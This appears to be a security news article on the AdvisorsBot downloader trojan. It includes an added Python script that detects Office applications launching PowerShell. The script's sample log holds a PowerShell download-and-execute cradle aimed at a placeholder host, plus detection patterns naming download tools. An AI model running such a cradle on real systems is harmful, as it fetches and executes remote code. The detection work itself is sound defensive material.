Security researchers have discovered a new C-based downloader trojan known as AdvisorsBot targeting governmental, telecommunications and leisure organisations.
AdvisorsBot is being distributed through large-scale spam campaigns using several different lure documents. These documents contain malicious macros that execute a PowerShell script to download and install AdvisorsBot.
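The chain described above (lure document, macro, PowerShell, download) leaves a distinctive parent/child pair in process-creation telemetry: an Office application spawning powershell.exe. The following detection script is an added example, not code from the original report or from the researchers behind it; it runs over a handful of constructed process-creation records in a pipe-separated format (timestamp, host, parent image, image, command line) that you would map onto your own Sysmon Event ID 1 or EDR export. Hostnames, paths, timestamps and the `example.invalid` URL are all invented for the sample.

```python
"""Flag Office-spawned PowerShell in process-creation telemetry.

Macro droppers such as the one described for AdvisorsBot launch PowerShell
from the Office process that opened the lure document, so the parent/child
pair "Office application -> powershell.exe" is a cheap early detection point.
The log format and every sample line below are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line fragments that raise the alert score. Matching is done on the
# lower-cased command line, so the patterns are written in lower case.
DOWNLOAD_PATTERNS = [
    (r"downloadstring|downloadfile|net\.webclient", "web client download"),
    (r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|start-bitstransfer", "web request"),
    (r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile", "no profile"),
]


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    host: str
    timestamp: str
    parent: str
    score: int
    reasons: List[str]


def parse_line(line: str) -> Optional[ProcessEvent]:
    """Parse one 'ts|host|parent_image|image|command_line' record.

    The command line may itself contain '|', so split at most four times.
    Returns None for malformed records instead of raising.
    """
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    return ProcessEvent(*parts)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Optional[Alert]:
    """Return an Alert if an Office process launched PowerShell, else None.

    The bare parent/child pair scores 1; each download/evasion fragment found
    in the command line adds 1 so that analysts can triage by score.
    """
    parent = _basename(ev.parent_image)
    child = _basename(ev.image)
    if parent not in OFFICE_PARENTS or child not in POWERSHELL_IMAGES:
        return None
    reasons = [f"{parent} spawned {child}"]
    score = 1
    cmd = ev.command_line.lower()
    for pattern, label in DOWNLOAD_PATTERNS:
        if re.search(pattern, cmd):
            reasons.append(label)
            score += 1
    return Alert(ev.host, ev.timestamp, parent, score, reasons)


def scan(lines: Iterable[str]) -> List[Alert]:
    """Run score_event over every parseable record, in input order."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        alert = score_event(ev)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample telemetry: two Office->PowerShell launches (one plain
# download cradle, one encoded command), one benign admin script run from
# Explorer, one benign Office child process, and one malformed record.
SAMPLE_LOG = [
    r'''2020-01-01T09:14:02Z|WS-0142|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"''',
    r'''2020-01-01T09:20:11Z|WS-0077|C:\Program Files\Microsoft Office\Office16\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA''',
    r'''2020-01-01T09:21:30Z|WS-0077|C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\Scripts\inventory.ps1''',
    r'''2020-01-01T09:22:45Z|WS-0142|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Windows\splwow64.exe|splwow64.exe 12288''',
    "garbage",
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.timestamp} {a.host} score={a.score} {'; '.join(a.reasons)}")
```

The score is deliberately simple: the parent/child pair alone is worth investigating on most estates, and the command-line fragments exist only to rank alerts, not to gate them, since a dropper that uses none of them still fires at score 1.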
Once installed, AdvisorsBot has much of the same functionality as the Marap downloader, including collecting user and system information before connecting to a command and control server.
An alternate version of AdvisorsBot, known as PoshAdvisor, also exists. Rewritten in PowerShell and .NET, it has the same functionality as AdvisorsBot.
Like most modern malware, AdvisorsBot employs a number of anti-analysis features. One of the most effective is the use of junk code, such as extra instructions, conditional statements, and loops, to considerably slow down reverse engineering.
Read a full report on this here
Indicators Of Compromise
SHA256 File Hashes
Duncan is a technology professional with over 20 years' experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.